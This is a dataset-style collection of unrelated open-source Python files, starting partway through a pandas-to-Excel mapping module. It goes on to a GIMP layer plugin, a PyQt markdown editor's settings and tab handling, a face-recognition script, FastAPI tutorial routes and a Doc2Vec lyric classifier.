used as label on y_axis
Returns
-------
Chart object corresponding to the engine selected
Notes
-----
values, categories parameters can only correspond to columns.
"""
if names is None and categories is None:
names = tuple(name for name in self.f.columns.values)
elif names is None and isinstance(categories, (str, int, list, tuple)):
names = categories
elif isinstance(names, (str, list, tuple)):
names = names
else:
raise TypeError("Couldn't understand names input: " + names)
if values is None:
values = tuple(self[value] for value in self.f.columns)
elif isinstance(values, list) or isinstance(values, tuple):
values = tuple(self[value] for value in values)
else:
values = self[values]
if categories is None and (type_ in SINGLE_CATEGORY_CHARTS and isinstance(values, tuple)) or \
type_ in CATEGORIES_REQUIRED_CHARTS:
categories = self.index # Default, use x as index
elif categories is None:
pass
elif isinstance(categories, (list, tuple)):
categories = list(self[category] for category in categories)
else:
categories = self[categories]
return create_chart(self.book, self.writer.engine, type_,
values, categories, names,
subtype, title,
x_axis_name, y_axis_name)
def __getitem__(self, key):
"""
Emulates DataFrame.__getitem__ (DataFrame[key] syntax), see Pandas DataFrame indexing for help on behaviour.
Will return the location of the columns found, rather than the underlying data.
Parameters
----------
key : hashable or array-like
hashables, corresponding to the names of the columns desired.
Returns
-------
XLRange :
corresponding to position of found colummn(s) within spreadsheet
Example
-------
>>> xlmap['Col 1']
<XLRange: B2:B10>
"""
val = self._mapper_frame[key]
return _mapper_to_xl(val)
@property
def loc(self):
"""
Proxy for DataFrame.loc, see Pandas DataFrame loc help for behaviour.
Will return location result rather than underlying data.
Returns
-------
XLCell or XLRange
corresponding to position of DataFrame, Series or Scalar found within spreadsheet.
Example
-------
>>> xlmap.loc['Tues']
<XLRange: A2:D2>
"""
return _SelectorProxy(self._mapper_frame, 'loc')
@property
def iloc(self):
"""
Proxy for DataFrame.iloc, see Pandas DataFrame iloc help for behaviour.
Will return location result rather than underlying data.
Returns
-------
XLCell or XLRange
corresponding to position of DataFrame, Series or Scalar found within spreadsheet.
Example
-------
>>> xlmap.iloc[3, :]
<XLRange: A2:D2>
"""
return _SelectorProxy(self._mapper_frame, 'iloc')
@property
def ix(self):
"""
Proxy for DataFrame.ix, see Pandas DataFrame ix help for behaviour. (That said this is deprecated since 0.20!)
Will return location result rather than underlying data.
Returns
-------
XLCell or XLRange
corresponding to position of DataFrame, Series or Scalar found within spreadsheet.
Example
-------
>>> xlmap.ix[3, :]
<XLRange A2:D2>
"""
return _SelectorProxy(self._mapper_frame, 'ix')
@property
def iat(self):
"""
Proxy for DataFrame.iat, see Pandas DataFrame iat help for behaviour.
Will return location result rather than underlying data.
Returns
-------
XLCell
location corresponding to position value within spreadsheet.
Example
-------
>>> xlmap.iat[3, 2]
<XLCell C3>
"""
return _SelectorProxy(self._mapper_frame, 'iat')
@property
def at(self):
"""
Proxy for DataFrame.at, see Pandas DataFrame at help for behaviour.
Will return location result rather than underlying data.
Returns
-------
XLCell
location corresponding to position value within spreadsheet.
Example
-------
>>> xlmap.at["Mon", "Lunch"]
<XLCell: C3>
"""
return _SelectorProxy(self._mapper_frame, 'at')
class XLDataFrame(pd.DataFrame):
"""
Monkeypatched DataFrame modified by xl_link!
Changes:
--------
* to_excel modified to return an XLMap.
* XLDataFrame._constructor set to XLDataFrame -> stops reverting to normal DataFrame
Notes
-----
Conversions from this DataFrame to Series or Panels will return regular Panels and Series,
which will convert back into regular DataFrame's upon expanding/ reducing dimensions.
See Also
--------
Pandas.DataFrame
"""
@property
def _constructor(self):
return XLDataFrame
def to_excel(self, excel_writer, sheet_name='Sheet1', na_rep='',
float_format=None, columns=None, header=True, index=True,
index_label=None, startrow=0, startcol=0, engine=None,
merge_cells=True, encoding=None, inf_rep='inf', verbose=True,
**kwargs):
"""
Monkeypatched DataFrame.to_excel by xl_link!
Changes:
--------
Returns
-------
XLMap
corresponding to position of frame as it appears in excel (see XLMap for details)
See Also
--------
Pandas.DataFrame.to_excel for info on parameters
Note
----
When providing a path as excel_writer, default engine used is 'xlsxwriter', as xlsxwriter workbooks can only be
saved once, xl_link suppresses calling `excel_writer.save()`, as a result, `xlmap.writer.save()` should be
called once no further changes are to be made to the spreadsheet.
"""
if isinstance(excel_writer, pd.ExcelWriter):
need_save = False
else:
excel_writer = pd.ExcelWriter(_stringify_path(excel_writer), engine=engine)
need_save = True if excel_writer.engine != 'xlsxwriter' else False # xlsxwriter can only save once!
super().to_excel(excel_writer, sheet_name=sheet_name, na_rep=na_rep,
float_format=float_format, columns=columns, header=header, index=index,
index_label=index_label, startrow=startrow, startcol=startcol, engine=engine,
merge_cells=merge_cells, encoding=encoding, inf_rep=inf_rep, verbose=verbose,
**kwargs)
if need_save:
excel_writer.save()
data_range, index_range, col_range, _ = get_xl_ranges(self.index, self.columns,
sheet_name=sheet_name,
columns=columns,
header=header,
index=index,
index_label=index_label,
startrow=startrow,
startcol=startcol,
merge_cells=merge_cells)
f = self.copy()
if isinstance(columns, list) or isinstance(columns, tuple):
f = f[columns]
return XLMap(data_range, index_range, col_range, f, writer=excel_writer)
``` |
{
"source": "0ion9/gimp-plugins",
"score": 2
} |
#### File: 0ion9/gimp-plugins/backgroundify.py
```python
from gimpfu import *
gettext.install("gimp20-python", gimp.locale_directory, unicode=True)
BGCOLOR, PATTERN = 0, 1
MODES = (
(_('Normal'), NORMAL_MODE),
(_('Dissolve'), DISSOLVE_MODE),
(_('Lighten only'), LIGHTEN_ONLY_MODE),
(_('Screen'), SCREEN_MODE),
(_('Dodge'), DODGE_MODE),
(_('Addition'), ADDITION_MODE),
(_('Darken Only'), DARKEN_ONLY_MODE),
(_('Multiply'), MULTIPLY_MODE),
(_('Burn'), BURN_MODE),
(_('Overlay'), OVERLAY_MODE),
(_('Soft Light'), SOFTLIGHT_MODE),
(_('Hard Light'), HARDLIGHT_MODE),
(_('Difference'), DIFFERENCE_MODE),
(_('Subtract'), SUBTRACT_MODE),
(_('Grain Extract'), GRAIN_EXTRACT_MODE),
(_('Grain Merge'), GRAIN_MERGE_MODE),
(_('Divide'), DIVIDE_MODE),
(_('Hue'), HUE_MODE),
(_('Saturation'), SATURATION_MODE),
(_('Color'), COLOR_MODE),
(_('Value'), VALUE_MODE),
(_('Behind(?)'), BEHIND_MODE),
)
MODELIST = tuple(v[0] for v in MODES)
#
# some modes have a 'neutral color' that results in no change; we try to use this when creating a new layer without alpha.
#
# Note that the pairs (MULTIPLY, DIVIDE) and (ADD, SUB) each have inverse effects with the same neutral color
# (eg. multiply reduces brightness proportional to distance from 255, divide increases brightness proportional to distance from 0)
#
# Other modes have no neutral color and obtaining 0 effect is only done via setting alpha=0 or layer_opacity=0
MODENEUTRALCOLOR = (
({LIGHTEN_ONLY_MODE, ADDITION_MODE, SCREEN_MODE, SUBTRACT_MODE, DODGE_MODE}, (0, 0, 0)),
({DARKEN_ONLY_MODE, MULTIPLY_MODE, BURN_MODE, DIVIDE_MODE}, (255, 255, 255)),
({GRAIN_MERGE_MODE, GRAIN_EXTRACT_MODE, OVERLAY_MODE, HARDLIGHT_MODE, SOFTLIGHT_MODE}, (128, 128, 128))
)
def without_group_layers(layerlist):
"""Returns a recursively flattened list of layers.
Group layers are recursed into but not included in results."""
layers = []
for l in layerlist:
if pdb.gimp_item_is_group(l):
layers.extend(without_group_layers(l.children))
else:
layers.append(l)
return layers
def new_layer(image, drawable, name, mode, opacity, alpha):
pdb.gimp_image_undo_group_start(image)
layertype = image.layers[0].type
mode = MODES[mode][-1]
layer = pdb.gimp_layer_new(image, image.width, image.height, layertype, name, opacity, mode)
for members, fillcolor in MODENEUTRALCOLOR:
if mode in members:
pdb.gimp_context_push()
pdb.gimp_context_set_background(fillcolor)
pdb.gimp_drawable_fill(layer, BACKGROUND_FILL)
pdb.gimp_context_pop()
break
else:
pdb.gimp_drawable_fill(layer, WHITE_FILL)
pdb.gimp_image_insert_layer(image, layer, None, -1)
if alpha:
pdb.gimp_layer_add_alpha(layer)
# else:
# pdb.gimp_layer_remove_alpha(layer)
pdb.gimp_image_undo_group_end(image)
def backgroundify(image, drawable, fillmode, all_layers):
all_layers = (all_layers == 1)
# XXX cope with layer groups (they should be unaffected)
layers = []
# drawable is set to None for group layers
base = [drawable if drawable else image.active_layer]
if all_layers:
base = list(image.layers)
layers = without_group_layers(base)
pdb.gimp_image_undo_group_start(image)
bfill_mode = (BG_BUCKET_FILL if fillmode == BGCOLOR else PATTERN_BUCKET_FILL)
for layer in layers:
pdb.gimp_edit_bucket_fill_full(layer, bfill_mode, BEHIND_MODE, 100.0, 255.0, 0, 1, 0, 0, 0)
pdb.gimp_image_undo_group_end(image)
register(
proc_name="python-fu-backgroundify",
blurb="Add a background color/pattern to current or all layers.",
help=("Add a background color/pattern to current or all layers. Note that only the selected area is affected."
" You may filter only the contents of a given layer group, by having it selected before invoking this filter. "),
author="<NAME>",
copyright="<NAME>",
date=("2015"),
label=("_Backgroundify layer(s)..."),
imagetypes=("*"),
params=[
(PF_IMAGE, "image", "_Image", None),
(PF_LAYER, "drawable", "_Drawable", None),
(PF_OPTION, "Fillmode", "_Fill mode", 0,
(_("Background Color"),
_("Pattern"))),
(PF_BOOL, "all_layers", "Apply to _all layers", 0),
],
results=[],
function=backgroundify,
menu=("<Image>/Layer/Transparency"),
domain=("gimp20-python", gimp.locale_directory)
)
register(
proc_name="python-fu-new-layer",
blurb="Quickly create a new image-sized layer with specified mode and opacity",
help=("..."),
author="<NAME>",
copyright="<NAME>",
date=("2015"),
label=("_New Layer(quick)..."),
imagetypes=("*"),
params=[
(PF_IMAGE, "image", "_Image", None),
(PF_LAYER, "drawable", "_Drawable", None),
(PF_STRING, "name", "_Name", "Layer"),
(PF_OPTION, "mode", "_Blending mode", 0,
MODELIST),
(PF_SLIDER, "opacity", "_Opacity", 100, (0, 100, 1)),
(PF_BOOL, "alpha", "Alpha channel", 0),
],
results=[],
function=new_layer,
menu=("<Image>/Layer/Stack"),
domain=("gimp20-python", gimp.locale_directory)
)
main()
``` |
{
"source": "0ip/pymarkview",
"score": 3
} |
#### File: pymarkview/pymarkview/settings.py
```python
import io
import json
from pathlib import Path
class Settings:
FILE = "settings.json"
DEFAULTS = {
"font_family": "Consolas",
"font_size": 12,
"tab_width": 2,
"word_wrap": True,
"show_menu": True,
"md_parser": "markdown2",
"mathjax": True
}
def __init__(self):
self.__load_settings()
def __getattr__(self, key: str) -> str:
return self.DEFAULTS.get(key, None)
def get(self, key: str) -> str:
return self.DEFAULTS.get(key, None)
def set(self, key: str, value) -> None:
self.DEFAULTS[key] = value
self.__save_settings()
def __load_settings(self) -> None:
if not Path(self.FILE).exists():
self.__save_settings()
return
with io.open(self.FILE, "r", encoding="utf-8") as f:
try:
user_settings = json.load(f)
except json.decoder.JSONDecodeError:
raise SettingsError("Cannot read settings!")
for key, value in user_settings.items():
if key in self.DEFAULTS:
self.DEFAULTS[key] = value
else:
print("Found unknown setting '{key}'. Skipping.".format(key=key))
user_settings_stale = False
for key, value in self.DEFAULTS.items():
if key not in user_settings:
print("Adding new setting '{key}'.".format(key=key))
user_settings_stale = True
if user_settings_stale:
self.__save_settings()
def __save_settings(self) -> None:
with io.open(self.FILE, "w", encoding="utf-8") as f:
json.dump(self.DEFAULTS, f, indent=4, sort_keys=True)
class SettingsError(Exception):
def __init__(self, message):
super().__init__(message)
```
#### File: pymarkview/ui/tabbed_editor.py
```python
import io
import pickle
from PyQt5.QtCore import pyqtSignal
from PyQt5.QtGui import QTextCursor
from PyQt5.QtWidgets import QFileDialog
from PyQt5.QtWidgets import QMessageBox
from PyQt5.QtWidgets import QTabWidget
from pymarkview.resources.defaults import welcome_text
from pymarkview.util import resource_path
from pathlib import Path
class TabbedEditor(QTabWidget):
text_changed = pyqtSignal()
tab_changed = pyqtSignal()
tab_title_changed = pyqtSignal(str)
file_saved = pyqtSignal(str)
STATE_FILE = ".saved_state"
DEFAULT_TAB_NAME = "untitled"
def __init__(self, parent, editor_widget, settings, *args):
super().__init__(*args)
self.__set_style()
self._parent = parent
self._editor_widget = editor_widget
self._settings = settings
self._editor_state = {}
self._tab_state = {}
self._mapping = self.TabIndexMapping()
self.__load_state()
self.tabCloseRequested.connect(self.close_tab)
self.currentChanged.connect(self.__tab_changed)
@property
def current_editor(self):
return self._editor_state.get(self._mapping.get_uid(self.currentIndex()))
@property
def current_tab_state(self):
return self._tab_state.get(self._mapping.get_uid(self.currentIndex()))
def __get_tab_state(self, tab_index=None):
if tab_index is not None:
return self._tab_state.get(self._mapping.get_uid(tab_index))
else:
return self._tab_state.get(self._mapping.get_uid(self.currentIndex()))
def __get_editor_state(self, tab_index):
if tab_index is not None:
return self._editor_state.get(self._mapping.get_uid(tab_index))
else:
return self._editor_state.get(self._mapping.get_uid(self.currentIndex()))
def __new_state(self, tab_index, editor_obj):
uid = self._mapping.add(tab_index)
self._tab_state.update({uid: {
"modified": False,
"path": None,
"text": ""
}})
self._editor_state.update({uid: editor_obj})
def __update_tab_state(self, attrib_dict, tab_index=None):
if tab_index is None:
tab_index = self.currentIndex()
uid = self._mapping.get_uid(tab_index)
if self._tab_state.get(uid):
update_tab_title = False
for attrib, value in attrib_dict.items():
self._tab_state.get(uid)[attrib] = value
if attrib in ("path", "modified"):
update_tab_title = True
if update_tab_title:
self.__update_tab_title()
def __get_path(self, tab_index=None):
state = self.__get_tab_state(tab_index)
return state["path"]
def __get_filename(self, tab_index=None):
path = self.__get_path(tab_index)
if path:
return str(Path(path).name)
else:
return self.DEFAULT_TAB_NAME
def get_filename(self):
return self.tabText(self.currentIndex())
def new_tab(self, append=False):
new_ln_editor = self._editor_widget(self._settings)
if append:
tab_index = self.addTab(new_ln_editor, self.DEFAULT_TAB_NAME)
else:
tab_index = self.insertTab(self.currentIndex() + 1, new_ln_editor, self.DEFAULT_TAB_NAME)
self.__new_state(tab_index, new_ln_editor.editor)
if len(self._editor_state) == 1:
self.__connect_tab_signals(tab_index)
else:
self.setCurrentIndex(tab_index)
return tab_index
def close_tab(self, tab_index):
state = self.__get_tab_state(tab_index)
if state["modified"]:
res = self.__show_save_dialog()
if res == QMessageBox.Yes:
if not self.save_file():
return False
elif res == QMessageBox.Cancel:
return False
if len(self._editor_state) == 1:
self.new_tab()
self.removeTab(tab_index)
uid = self._mapping.remove(tab_index)
self._tab_state.pop(uid)
self._editor_state.pop(uid)
self.tab_changed.emit()
def set_text(self, text, tab_index=None):
editor = self.__get_editor_state(tab_index)
if editor:
editor.setPlainText(text)
def get_text(self, tab_index=None):
editor = self.__get_editor_state(tab_index)
if editor:
return editor.toPlainText()
def open_file(self, path, pmv_file=False):
if path:
return self.__open_file_helper(path, pmv_file)
else:
filename, _ = QFileDialog.getOpenFileName(self._parent,
"Open Markdown text file", "", "Text Files (*.txt;*.md);;All Files (*)")
if filename:
return self.__open_file_helper(filename)
else:
return False
def __open_file_helper(self, path, pmv_file=False):
assert path, "No file name provided!"
if pmv_file:
curr_path = self.__get_path()
if not curr_path: # temporary, unsaved tabs
return False
path = str(Path(self.__get_path()).parent.joinpath(path))
for uid, attrib_dict in self._tab_state.items():
if attrib_dict["path"]:
if Path(attrib_dict["path"]) == Path(path):
self.setCurrentIndex(self._mapping.get_index(uid))
return False
if Path(path).exists():
with io.open(path, "r", encoding="utf-8", errors="replace") as f:
data = f.read()
tab_index = self.new_tab(append=True)
self.set_text(data, tab_index)
self.__update_tab_state({"path": path, "modified": False})
return True
else:
return False
def save_file(self):
state = self.current_tab_state
path = state["path"]
if path:
with io.open(path, "w", encoding="utf-8") as f:
f.write(self.get_text())
self.file_saved.emit(path)
self.__update_tab_state({"modified": False})
return True
else:
return self.save_as_file()
def save_as_file(self):
path, sel_filter = QFileDialog.getSaveFileName(self._parent, "Save as...", "", "Markdown File (*.md);;Text File (*.txt)")
if path:
with io.open(path, "w", encoding="utf-8") as f:
f.write(self.get_text())
self.file_saved.emit(path)
self.__update_tab_state({"path": path, "modified": False})
return True
return False
def load_instructions(self):
tab_index = self.new_tab()
self.set_text(welcome_text, tab_index)
self.__update_tab_state({"modified": False}, tab_index)
def __handle_text_change(self):
self.__update_tab_state({"modified": True})
self.text_changed.emit()
def __connect_tab_signals(self, tab_index):
self.__get_editor_state(tab_index).textChanged.connect(self.__handle_text_change)
self.__get_editor_state(tab_index).document_dropped.connect(self.open_file)
def __tab_changed(self, tab_index):
self.__connect_tab_signals(tab_index)
self.tab_changed.emit()
def __load_state(self):
if Path(self.STATE_FILE).exists():
with io.open(self.STATE_FILE, "rb") as f:
state = pickle.load(f)
self._mapping.import_mapping(state["mapping"])
for uid in self._mapping.mapping:
new_ln_editor = self._editor_widget(self._settings)
tab_index = self.addTab(new_ln_editor, self.DEFAULT_TAB_NAME)
self._editor_state.update({uid: new_ln_editor.editor})
self.__connect_tab_signals(tab_index)
self._tab_state = state["tab_state"]
for uid, tab_state in self._tab_state.copy().items():
tab_index = self._mapping.get_index(uid)
self.setCurrentIndex(tab_index)
if tab_state["modified"]:
self.set_text(tab_state["text"], tab_index)
self._tab_state[uid]["modified"] = True
else:
path = tab_state["path"]
if path:
if Path(path).exists():
with io.open(path, "r", encoding="utf-8") as f:
data = f.read()
self.set_text(data, tab_index)
self._tab_state[uid]["modified"] = False
else:
self.set_text(tab_state["text"], tab_index)
self._tab_state[uid]["modified"] = True
else:
self.set_text(tab_state["text"], tab_index)
self._tab_state[uid]["modified"] = False
self.__update_tab_title(self._mapping.get_index(uid))
self.setCurrentIndex(state["active_tab"])
current_editor = self.current_editor
current_editor.moveCursor(QTextCursor.End)
cursor = QTextCursor(current_editor.document().findBlockByLineNumber(state["active_line"]))
current_editor.setTextCursor(cursor)
else:
self.load_instructions()
def save_state(self):
for tab_index in range(self.count()):
self.__update_tab_state({"text": self.get_text(tab_index)}, tab_index)
state = {
"active_tab": self.currentIndex(),
"active_line": self.current_editor.textCursor().blockNumber(),
"mapping": self._mapping.export_mapping(),
"tab_state": self._tab_state
}
with io.open(self.STATE_FILE, "wb") as f:
pickle.dump(state, f)
def __update_tab_title(self, tab_index=None):
if tab_index is None:
tab_index = self.currentIndex()
state = self.__get_tab_state(tab_index)
title = ""
title += self.__get_filename(tab_index)
title += " •" if state["modified"] else ""
self.setTabText(tab_index, title)
self.tab_title_changed.emit(title)
def __show_save_dialog(self):
msg = QMessageBox()
# msg.setWindowIcon(self.app_icon)
msg.setIcon(QMessageBox.Warning)
msg.setWindowTitle("Save Changes?")
msg.setText("{file} has been modified. Save changes?".format(file=self.__get_filename()))
msg.addButton(QMessageBox.Yes)
msg.addButton(QMessageBox.No)
msg.addButton(QMessageBox.Cancel)
return msg.exec()
def __set_style(self):
self.setTabsClosable(True)
self.setStyleSheet('''
QTabBar::close-button {
image: url(''' + resource_path("pymarkview/resources/close.png") + ''');
}
QTabBar::close-button:hover {
image: url(''' + resource_path("pymarkview/resources/close-hover.png") + ''');
}
''')
class TabIndexMapping:
def __init__(self):
self._mapping = []
self._mapping_uid = 1000
def add(self, index=None):
uid = self._mapping_uid
if index is not None:
self._mapping.insert(index, uid)
else:
self._mapping.append(uid)
self._mapping_uid += 1
return uid
def remove(self, index):
return self._mapping.pop(index)
def get_uid(self, index):
return self._mapping[index]
def get_index(self, uid):
return self._mapping.index(uid)
@property
def mapping(self):
return self._mapping
def export_mapping(self):
return {"__mapping": self._mapping, "__mapping_uid": self._mapping_uid}
def import_mapping(self, mapping_dict):
self._mapping = mapping_dict["__mapping"]
self._mapping_uid = mapping_dict["__mapping_uid"]
``` |
{
"source": "0-jam/face_detector",
"score": 3
} |
#### File: 0-jam/face_detector/cli_dark_face_recognizer.py
```python
import argparse
from pathlib import Path
import time
import cv2
from modules.dark_recognizer import recognize_face
def main():
parser = argparse.ArgumentParser(description='Recognize objects using pre-trained Darknet model')
parser.add_argument('input', type=str, help='Input file')
parser.add_argument('--output', '-o', type=str, help='Output file (default: none)')
args = parser.parse_args()
img = cv2.imread(str(Path(args.input)))
start_time = time.time()
faces = recognize_face(img)
elapsed_time = time.time() - start_time
print('Found objects: {}, Elapsed time: {:.2f} sec'.format(len(faces), elapsed_time))
print(faces)
out_path = args.output
if out_path is not None:
with Path(out_path).open('w') as out_json:
out_json.write(json.dumps(faces, ensure_ascii=False))
if __name__ == "__main__":
main()
``` |
{
"source": "0-jam/fastapi_tutorials",
"score": 3
} |
#### File: 0-jam/fastapi_tutorials/items.py
```python
from typing import Optional
from fastapi import FastAPI, Path, Query
app = FastAPI()
# Recieve the parameter 'q' with the default value (None) and the limit of characters (5)
@app.get('/items/')
async def read_items(
q: Optional[str] = Query(
None,
min_length=3,
max_length=5,
# Custom metadata
# 'description' can be shown in the document
title='Query String',
description='Query string for the items',
alias='item-query',
)
):
results = {'items': [
{'item_id': 'Foo'},
{'item_id': 'Bar'},
]}
if q:
results.update({'q': q})
return results
# Recieve the parameter 'q' which accepts only the fixed value ('fixedquery') using reqular expressions
# This query is marked as deprecated (can be shown on documents)
@app.get('/items_fixed/')
async def read_items_fixed(q: Optional[str] = Query(None, min_length=3, max_length=50, regex='^fixedquery$', deprecated=True)):
results = {'items': [
{'item_id': 'Foo'},
{'item_id': 'Bar'},
]}
if q:
results.update({'q': q})
return results
# Recieve the parameter 'q' which accepts only the fixed value ('fixedquery') using reqular expressions
@app.get('/items_required/')
async def read_items_required(q: str = Query(..., min_length=3, max_length=5)):
results = {'items': [
{'item_id': 'Foo'},
{'item_id': 'Bar'},
]}
if q:
results.update({'q': q})
return results
@app.get('/items/{item_id}')
async def read_item(
# Pass parameters as keyword arguments
# All parameters are required
# gt: greater than
# lt: less than
# ge: greater than or equal
# le: less than or equal
*,
item_id: int = Path(
...,
title='The ID of the item to get',
ge=1,
lt=100,
),
q: str,
size: float = Query(..., gt=0, le=10.5),
):
results = {'item_id': item_id, 'size': size}
if q:
results.update({'q': q})
return results
``` |
{
"source": "0-jam/markovify_my_tweets",
"score": 3
} |
#### File: 0-jam/markovify_my_tweets/classify_lyric.py
```python
import argparse
import json
import multiprocessing as mp
import re
import unicodedata
from pathlib import Path
from gensim.models.doc2vec import Doc2Vec, TaggedDocument
from modules.transform_text import deconjugate_sentence, remove_stopwords
# from modules.transform_text import extract_nouns, remove_stopwords
NUM_CPU = mp.cpu_count()
D2V_EPOCHS = 100
# 引数sentenceを整形
def replace_sentence(sentence):
# unicode正規化
sentence = unicodedata.normalize('NFKC', sentence)
# 不要な記号を削除
sentence = re.sub(r'\W', '', sentence)
return sentence
# Preprocess the text for Doc2Vec
def preprocess_text(text):
normalized_text = replace_sentence(text.strip())
divided_text = deconjugate_sentence(normalized_text)
# divided_text = extract_nouns(normalized_text)
return remove_stopwords(divided_text)
def main():
parser = argparse.ArgumentParser(description='Classify sentence with doc2vec')
# Required arguments
parser.add_argument('input', type=str, help='Input JSON file path generated from utanet_scraper.py')
parser.add_argument('generated_file', type=str, help='Generated lyrics from rnn_sentence.py')
parser.add_argument('--d2vmodel', type=str, help='Doc2vec model path')
args = parser.parse_args()
if args.d2vmodel:
print('Loading doc2vec model...')
d2vmodel = Doc2Vec.load(args.d2vmodel)
else:
input_path = Path(args.input)
with input_path.open(encoding='utf-8') as json_data:
dataset = json.load(json_data).values()
# Attribute as data or labels
data_attr = 'lyric'
label_attrs = ['artist']
print('Generating doc2vec model...')
docs = [TaggedDocument(preprocess_text(data[data_attr]), tags=[unicodedata.normalize('NFKC', data[attr]) for attr in label_attrs]) for data in dataset]
d2vmodel = Doc2Vec(docs, vector_size=256, window=5, min_count=3, epochs=D2V_EPOCHS, workers=NUM_CPU)
d2vmodel.save(input_path.stem + '.model')
with Path(args.generated_file).open() as generated_lyrics:
for i, generated_lyric in enumerate(generated_lyrics):
print('Song', i)
print(d2vmodel.docvecs.most_similar([d2vmodel.infer_vector(preprocess_text(generated_lyric))]))
if __name__ == '__main__':
main()
``` |
Subsets and Splits